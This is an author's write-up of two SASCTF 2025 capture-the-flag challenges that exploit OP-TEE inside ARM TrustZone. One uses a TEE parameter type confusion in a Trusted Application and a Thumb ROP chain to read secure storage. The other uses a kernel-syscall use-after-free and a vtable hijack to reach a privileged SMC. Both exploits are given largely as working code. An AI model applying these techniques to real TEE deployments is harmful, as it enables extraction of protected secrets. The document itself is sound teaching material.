Trust Issues & Broken Trust: OP-TEE Exploitation (SASCTF'25 Quals)
CTF
SASCTF
OP-TEE
TrustZone
ARM
I authored two OP-TEE exploitation challenges for the SASCTF 2025 Quals. The first one, Trust Issues, targets a vulnerable Trusted Application. The second, Broken Trust, goes deeper into the OP-TEE kernel itself. Both run on QEMU with OP-TEE 4.5.0.
Table of Contents:
Background: ARM TrustZone and OP-TEE
Challenge 1: Trust Issues (TA Exploitation)
Challenge 2: Broken Trust (Kernel Exploitation)
Background: ARM TrustZone and OP-TEE
ARM TrustZone is a hardware security extension that splits the processor into two worlds: the Normal World (where Linux, Android, etc. run) and the Secure World (where security-sensitive code runs in isolation). The two worlds share the same physical cores but have separate address spaces, and the hardware enforces that the normal world cannot access secure world memory. Transitions between worlds go through the Secure Monitor (EL3 on AArch64), typically via SMC (Secure Monitor Call) instructions.
OP-TEE (Open Portable Trusted Execution Environment) is an open-source TEE OS that runs in the secure world. It provides a kernel, a set of syscalls, and an environment for running Trusted Applications (TAs). TAs are small programs that run inside the TEE and can access secure storage, perform cryptographic operations, and handle sensitive data that the normal world shouldn’t see.
The communication flow looks like this: a normal-world client (running on Linux) opens a session to a TA via the TEE Client API (libteec). It then sends commands with parameters. Parameters can be either memory references (TEEC_MEMREF) pointing to shared buffers, or values (TEEC_VALUE) carrying raw integers. The OP-TEE driver marshals these across the world boundary, and the TA receives them as TEE_Param unions on the secure side.
One important security property: TAs are signed. OP-TEE verifies the signature before loading a TA, so you can’t just compile your own TA and load it. On top of that, OP-TEE’s secure storage is encrypted with a key derived from the Hardware Unique Key (HUK), which differs between builds. So even if you could somehow extract the encrypted storage, you couldn’t decrypt it without the correct HUK.
With that context, let’s get into the challenges.
Challenge 1: Trust Issues (TA Exploitation)
Category: pwn
Solves: 6
Description:
Target system is a secure-world Trustlet running inside a TEE. The codebase is signed, verified, and marked production ready. But something doesn’t add up.
The flag is stored in OP-TEE’s secure storage under the object ID "flag". The goal is to read it out.
Why You Can’t Just Load Your Own TA
As mentioned above, TAs are signed, and the production environment uses a custom TA_SIGN_KEY, so loading your own TA is not an option. The CMD_READ_SECURE_OBJECT command is also compiled out in production (#ifdef PARTICIPANTS_BUILD / #ifdef STAGING_BUILD).
More importantly, the production build uses a different HUK (Hardware Unique Key). OP-TEE derives its secure storage encryption keys from the HUK, so each build variant has its own set of keys:
#ifdef STAGING_BUILD
static const uint8_t huk[] = { 0x4A, 0xE8, 0xBB, 0xB1, ... };
memcpy(hwkey->data, huk, sizeof(huk));
#elif PARTICIPANTS_BUILD
static const uint8_t huk[] = { 0x00, 0x01, 0x02, ... };
memcpy(hwkey->data, huk, sizeof(huk));
#endif
Even if you could extract the encrypted storage from the filesystem, you couldn’t decrypt it without the production HUK.
The Trusted Application
The TA implements a simplified Brainfuck interpreter. Three commands are available:
-
CMD_RUN_CODE(0): run Brainfuck code with input/output buffers -
CMD_WRITE_SECURE_OBJECT(1): write data to secure storage (used during flag setup) -
CMD_READ_SECURE_OBJECT(2): read from secure storage (compiled out in production)
The Brainfuck VM supports six operations: +/- increment/decrement the current cell, >/< move the memory pointer, , reads a byte from input into memory, . writes a byte from memory to output. No loops ([/]).
static TEE_Result run_code(VmContext_t *context) {
for (size_t i = 0; i < context->code_sz; i++) {
const char c = context->code[i];
switch (c) {
case '+': context->memory[context->memory_idx]++; break;
case '-': context->memory[context->memory_idx]--; break;
case '>': context->memory_idx++; break;
case '<': context->memory_idx--; break;
case '.':
context->output[context->output_idx++] =
context->memory[context->memory_idx++];
break;
case ',':
context->memory[context->memory_idx++] =
context->input[context->input_idx++];
break;
}
}
return TEE_SUCCESS;
}
The VmContext_t structure holds pointers to the code, input, output, and a 0x4000-byte memory tape:
typedef struct {
const char *code;
const size_t code_sz;
char *input;
size_t input_idx;
const size_t input_sz;
char *output;
size_t output_idx;
const size_t output_sz;
char *memory;
size_t memory_idx;
const size_t memory_sz;
} VmContext_t;
The Vulnerability: Type Confusion
The run_code_cmd handler expects three memory reference parameters (code, input, output), but it never validates the parameter types:
static TEE_Result run_code_cmd(uint32_t param_types, TEE_Param params[4]) {
uint32_t exp_param_types =
TEE_PARAM_TYPES(TEE_PARAM_TYPE_MEMREF_INPUT, // "Brainfuck" code
TEE_PARAM_TYPE_MEMREF_INOUT, // Input buffer
TEE_PARAM_TYPE_MEMREF_INOUT, // Output buffer
TEE_PARAM_TYPE_NONE);
// Oooops, forgot to check param types :(
// if (param_types != exp_param_types) {
// return TEE_ERROR_BAD_PARAMETERS;
// }
const char *code = params[0].memref.buffer;
char *input = params[1].memref.buffer;
char *output = params[2].memref.buffer;
...
Compare this to write_secure_object_cmd, which does the check properly:
if (param_types != exp_param_types)
return TEE_ERROR_BAD_PARAMETERS;
The TEE_Param type is a union. It can hold either a memref (pointer + size) or a value (two uint32_t fields, a and b). The memref.buffer field and value.a field overlap at the same offset in the union. So if the normal-world client sends a TEEC_VALUE_INOUT parameter where the TA expects TEEC_MEMREF_INOUT, the TA interprets the integer value as a memory address.
This is the key insight: by passing an arbitrary address as value.a, you can make the Brainfuck VM read from or write to any address in the TA’s address space. The , operation reads bytes from “input” (actually your controlled address) into the VM memory, and . writes bytes from memory to “output” (also your controlled address).
Building The Primitives
The exploit communicates with the TA from a normal-world Linux client using libteec. The type confusion is triggered by mixing TEEC_MEMREF_TEMP_INOUT and TEEC_VALUE_INOUT parameter types:
// Normal: pass a shared memory buffer
set_tmpref_arg(TA_ARG_INPUT, &op, input_buffer, size);
// Exploit: pass a raw address instead
set_value_arg(TA_ARG_INPUT, &op, 0x00117000, 0x42424242);
The Brainfuck code itself is built programmatically. For reading N bytes from the confused “input” address into the output buffer:
generate_readn(code, 0x200); // 0x200 commas: read from input to memory
generate_mem_prev(code + 0x200, 0x200); // 0x200 '<': rewind memory pointer
generate_writen(code + 0x400, 0x200); // 0x200 dots: write memory to output
This gives arbitrary read. For arbitrary write, flip the direction: confuse the “output” parameter to point at the target address, then use , to read from a normal input buffer into memory, and . to write from memory to the target address.
Exploitation: Three Invocations
ASLR is disabled (CFG_TA_ASLR=n), so addresses are predictable. The TA code base is at 0x00117000 and the stack starts at 0x0014a000.
Invocation 1: Confirm the code base. The input parameter is confused to point at 0x00117000. The Brainfuck code reads bytes from that address and copies them to a normal output buffer. If the first 10 bytes match the expected TA_CreateEntryPoint prologue (\x4D\xF8\x04\x7D\x00\xAF\x4F\xF0\x00\x03), the base address is confirmed:
op.paramTypes = TEEC_PARAM_TYPES(TEEC_MEMREF_TEMP_INOUT, TEEC_VALUE_INOUT,
TEEC_MEMREF_TEMP_INOUT, TEEC_NONE);
set_value_arg(TA_ARG_INPUT, &op, guessed_code_base, 0x42424242);
run_command(&sess, &op);
if (memcmp(output, "\x4D\xF8\x04\x7D\x00\xAF\x4F\xF0\x00\x03", 10) != 0)
errx(1, "Failed to guess the base address of the TA code section!");
Invocation 2: Stage data on the stack. Now the output parameter is confused to point at stack_base (0x0014a000). The exploit reads data from a normal input buffer (containing the object ID "flag" and space for the flag/handle) and writes it to the stack through the Brainfuck VM. This pre-stages the RopData_t structure at a known stack address:
typedef struct {
char object_id[4]; // "flag"
char flag_bytes[128]; // where the flag will be read into
uint32_t object_handle; // handle returned by OpenPersistentObject
uint32_t read_bytes; // bytes read counter
} RopData_t;
RopData_t *rop_data = (RopData_t *)input;
memcpy(rop_data->object_id, "flag", 4);
set_value_arg(TA_ARG_OUTPUT, &op, stack_base, 0x41414141);
Invocation 3: Write the ROP chain and trigger it. The output parameter is confused to point at stack_base + 0x2664 (the return address location). The Brainfuck code writes the ROP chain there. When run_code returns, the corrupted return address redirects execution into the chain.
The ROP Chain
The TA runs in AArch32 (Thumb-2) mode. We can’t allocate executable memory inside the TA, so ROP is the way. The chain needs to:
- Open the
"flag"object from secure storage - Read the flag data
- Copy it to a shared buffer so the normal-world client can see it
The TA conveniently includes an OpenPersistentObjectWrapper that wraps TEE_OpenPersistentObject with only 4 arguments (instead of 5), making it easier to call from a ROP chain on ARM where the first 4 args go in r0-r3:
static TEE_Result OpenPersistentObjectWrapper(TEE_ObjectHandle *object,
const char *obj_id,
size_t obj_id_sz,
uint32_t obj_data_flag) {
return TEE_OpenPersistentObject(TEE_STORAGE_PRIVATE, obj_id,
obj_id_sz, obj_data_flag, object);
}
The key gadget is pop {r0, r1, r2, r3}; pop {ip, pc} at offset 0x1f84, which loads all four argument registers plus a control flow target in one shot.
We skip the function prologue to not break our ROP execution (basically just the first STRD.W R7, LR, [SP,#-8+var_s0]!), and since we’re still operating in Thumb, the addresses are ORed with | 1.
const uint32_t pop_r0_r1_r2_r3_pop_ip_pc = ta_code_base + 0x00001f84;
const uint32_t memcpy_unchecked =
ta_code_base + 0x11AE4 | 1;
const uint32_t openpersistentobjectwrapper =
ta_code_base + 0x61c | 1;
const uint32_t tee_read_object_data =
ta_code_base + 0x5A28 | 1;
The chain has four stages:
Stage 1: Open the persistent object. Call OpenPersistentObjectWrapper(&object_handle, "flag", 4, 0x11). The 0x11 is TEE_DATA_FLAG_ACCESS_READ | TEE_DATA_FLAG_SHARE_READ. The handle gets written to stack_base + offsetof(RopData_t, object_handle):
P32(pop_r0_r1_r2_r3_pop_ip_pc, rop);
P32(stack_base + offsetof(RopData_t, object_handle), rop); // r0 = &handle
P32(stack_base + offsetof(RopData_t, object_id), rop); // r1 = "flag"
P32(sizeof(((RopData_t *)0)->object_id), rop); // r2 = 4
P32(0x11, rop); // r3 = flags
P32(0x45454545, rop); // ip (junk)
P32(openpersistentobjectwrapper, rop); // pc
Stage 2: Dereference the handle. OpenPersistentObjectWrapper writes the handle as a pointer to object_handle. But TEE_ReadObjectData needs the handle by value, not by pointer. So we use memcpy_unchecked to copy the handle value from where OP-TEE stored it (stack_base + 0x26a8) back into the ROP chain where r0 will be loaded for the next call:
P32(0x41414141, rop); // padding (r7)
P32(pop_r0_r1_r2_r3_pop_ip_pc, rop);
P32(stack_base + 0x26a8, rop); // r0 = dst
P32(stack_base + offsetof(RopData_t, object_handle), rop); // r1 = src
P32(sizeof(((RopData_t *)0)->object_handle), rop); // r2 = 4
P32(0x41414141, rop); // r3 (junk)
P32(0x41414141, rop); // ip (junk)
P32(memcpy_unchecked, rop); // pc
Stage 3: Read the flag. Call TEE_ReadObjectData(handle, flag_bytes, 128, &read_bytes):
P32(0x41414141, rop); // r7
P32(pop_r0_r1_r2_r3_pop_ip_pc, rop);
P32(0x41424344, rop); // r0 = handle (patched by stage 2)
P32(stack_base + offsetof(RopData_t, flag_bytes), rop); // r1 = output buf
P32(128, rop); // r2 = size
P32(stack_base + offsetof(RopData_t, read_bytes), rop); // r3 = &read_bytes
P32(0x41414141, rop); // ip
P32(tee_read_object_data, rop); // pc
Stage 4: Copy the flag to the shared buffer. The flag is now in flag_bytes on the stack, but the normal-world client can’t see the TA’s stack. So we use memcpy_unchecked to copy it to input_param_location + 0x01b8, which is the shared memory buffer mapped at 0x00200000:
P32(0x41414141, rop);
P32(pop_r0_r1_r2_r3_pop_ip_pc, rop);
P32(input_param_location + 0x01b8, rop); // r0 = dst (shared buf)
P32(stack_base + offsetof(RopData_t, flag_bytes), rop); // r1 = src (flag on stack)
P32(sizeof(((RopData_t *)0)->flag_bytes), rop); // r2 = 128
P32(0x41414141, rop); // r3
P32(0x41414141, rop); // ip
P32(memcpy_unchecked, rop); // pc
After this, the normal-world client just reads the input buffer:
printf("Input buffer (should be flag???): %s\n", input);
And indeed, after running the exploit, the flag is printed out:

Full exploit: exploit.c
Challenge 2: Broken Trust (Kernel Exploitation)
Category: pwn
Solves: 1
Description:
Now, you’ll need to exploit a vulnerability in the OP-TEE kernel itself to call privileged SMC handler and get the flag.
This one is a step up. The flag lives inside a custom SMC handler in TF-A (Trusted Firmware-A, the EL3 Secure Monitor). To reach it, you need arbitrary code execution in the OP-TEE kernel (S-EL1), not just in a TA (S-EL0).
Unlike Trust Issues, here the default OP-TEE signing keys are used, so participants can load their own TAs. The challenge is exploiting the kernel from within a TA.
The Architecture
The setup spans three privilege levels:
- TF-A (EL3): contains the custom SMC handlers. One returns a healthcheck string, the other returns the flag. Both are only callable from the secure world.
-
OP-TEE kernel (S-EL1): patched with a vulnerable custom syscall. Contains the
sas_do_smc_healthcheckwrapper function. - TA (S-EL0): user-written code running inside the TEE. Can invoke syscalls to talk to the kernel.
The flag handler in TF-A:
static uintptr_t sas_flag_smc_handler(void *handle) {
volatile const char flag[40] = "SAS{FLAG!!!!!!!!AAAAAAAAAAAAAAAAAAAAAAA}";
const uint64_t p1 = *(uint64_t *)flag;
const uint64_t p2 = *(uint64_t *)(flag + 8);
const uint64_t p3 = *(uint64_t *)(flag + 16);
const uint64_t p4 = *(uint64_t *)(flag + 24);
const uint64_t p5 = *(uint64_t *)(flag + 32);
SMC_RET6(handle, SMC_OK, p1, p2, p3, p4, p5);
}
It returns the flag split across SMC return registers. But it checks is_caller_non_secure(flags) and rejects calls from the normal world. The OP-TEE kernel has a convenient wrapper:
void sas_do_smc_healthcheck(uint32_t smc_id, char *out_buffer)
{
smc_id = (smc_id == 0xc2001338) ? 0xc2001338 : 0xc2001337;
struct thread_smc_args args = { .a0 = smc_id };
thread_smccc(&args);
*(uint64_t *)(&out_buffer[0]) = args.a1;
*(uint64_t *)(&out_buffer[8]) = args.a2;
...
}
If you call this with smc_id != 0xc2001338, it gets clamped to 0xc2001337 (the flag SMC). So the goal is: get the kernel to call sas_do_smc_healthcheck with any non-healthcheck argument, and provide an output buffer you can read.
The Custom Syscall
The OP-TEE kernel is patched with syscall number 0x45, syscall_sas. It’s a simple allocator with CRUD operations on up to 10 kernel heap buffers:
enum sas_cmd {
SAS_CMD_ALLOC_MEM = 0x1,
SAS_CMD_FREE_MEM = 0x2,
SAS_CMD_WRITE_MEM = 0x3,
SAS_CMD_READ_MEM = 0x4,
};
struct mem_entry {
size_t size;
void *va;
};
static struct mem_entry memdb[10] = {};
The alloc/free/read/write handlers:
static TEE_Result handle_alloc(unsigned long id, size_t len)
{
void *va = malloc(len);
if (!va)
return TEE_ERROR_OUT_OF_MEMORY;
memdb[id].va = va;
memdb[id].size = len;
return TEE_SUCCESS;
}
static TEE_Result handle_free(unsigned long id)
{
free(memdb[id].va);
return TEE_SUCCESS;
}
static TEE_Result handle_write(unsigned long id, void *buf, size_t len)
{
if (len > memdb[id].size)
return TEE_ERROR_BAD_PARAMETERS;
void *va = memdb[id].va;
if (!va)
return TEE_ERROR_ACCESS_DENIED;
return copy_from_user(va, buf, len);
}
static TEE_Result handle_read(unsigned long id, void *buf, size_t len)
{
if (len > memdb[id].size)
return TEE_ERROR_BAD_PARAMETERS;
void *va = memdb[id].va;
if (!va)
return TEE_ERROR_ACCESS_DENIED;
return copy_to_user(buf, va, len);
}
The Vulnerability: Use-After-Free
Look at handle_free: it frees the buffer but never NULLs out memdb[id].va or resets memdb[id].size. This means:
-
Use-after-free: after freeing entry
i, you can still callhandle_write(i, ...)andhandle_read(i, ...). The stale pointer passes theif (!va)check, so you read from and write to freed memory. -
Double-free: you can call
handle_free(i)multiple times on the same entry.
The TA invokes the syscall via inline assembly (syscall 0x45):
static TEE_Result do_svc(uint64_t op, uint64_t id, void *buf, size_t len) {
volatile register uint64_t x8 __asm("x8") = 0x45; // SVC number
volatile register uint64_t x0 __asm("x0") = op;
volatile register uint64_t x1 __asm("x1") = id;
volatile register uint64_t x2 __asm("x2") = (uint64_t)buf;
volatile register uint64_t x3 __asm("x3") = len;
__asm volatile("svc #0" : "=r"(x0) : "r"(x0), "r"(x1), "r"(x2), "r"(x3),
"r"(x8) : "memory");
return x0;
}
Exploitation: VTable Hijacking
OP-TEE’s kernel heap uses first-fit allocation. The exploit abuses this to overlap SAS-controlled buffers with crypto operation objects, then corrupts their virtual function tables.
Step 1: Allocate and free. Allocate 10 buffers of 0x1000 bytes through the SAS syscall, then free all of them:
for (uint32_t i = 0; i < 10; i++)
alloc(i, 0x1000);
for (uint32_t i = 0; i < 10; i++)
free_entry(i);
Step 2: Trigger reuse. Allocate 10 TEE_AllocateOperation objects with TEE_ALG_SHA512. The kernel allocates internal crypto_hash_ctx structures for these, and due to first-fit, they land in the buffers we just freed:
TEE_OperationHandle objects[10];
for (uint32_t i = 0; i < 10; i++) {
res = TEE_AllocateOperation(&objects[i], TEE_ALG_SHA512,
TEE_MODE_DIGEST, 0);
}
Step 3: Corrupt via stale handles. The SAS syscall’s write handler still has valid (stale) pointers to these buffers. We write crafted data through the old handles, overwriting the internals of the crypto_hash_ctx structures. The critical target is the ops pointer, a virtual function table that controls what happens when you call digest operations:
char data[0x1000] = {0};
memset(data, 0x41, sizeof(data));
// Point ops->update (and other vtable entries) to sas_do_smc_healthcheck
for (uint32_t i = 0; i < 458; i++)
p64(0xE1AD6FC, (data + i * 8));
// Overwrite ops pointers in the crypto context structures
for (uint32_t i = 375; i < 512; i++)
p64(0xe145f20, (data + i * 8));
for (uint32_t i = 0; i < 10; i++)
write(i, data, 0x1000);
ASLR is disabled (CFG_CORE_ASLR=n), so the kernel addresses of sas_do_smc_healthcheck and the fake vtable location are known.
Step 4: Trigger the call. Invoke TEE_DigestUpdate on each corrupted operation. This dispatches through the poisoned ops table, calling sas_do_smc_healthcheck in kernel context. Since TEE_DigestUpdate passes a data buffer and length as arguments, and sas_do_smc_healthcheck takes (uint32_t smc_id, char *out_buffer), the first argument ends up being something other than 0xc2001338, which means the kernel calls the flag SMC:
for (uint32_t i = 0; i < total_objects; i++)
TEE_DigestUpdate(objects[i], params[2].memref.buffer, 0x100);
The flag gets written into the output buffer via the SMC return registers, and the normal-world host reads it back.
One subtlety: using the high-level TEE_DigestDoFinal API causes a TA panic because sas_do_smc_healthcheck returns a non-zero value that the wrapper interprets as an error. The solution is to use TEE_DigestUpdate (or the even lower-level _utee_hash_final syscall) which has more lenient error handling.
The exploit is not fully reliable due to heap layout sensitivity and may need multiple attempts.
Full exploit: exploit.c
That’s it All source code and exploits: Team-Drovosec/sasctf-quals-2025.
Shoutout to LCD team (s41nt0l3xus, @wx0rx and @phoen1xxx) who solved both and wrote up their own approach: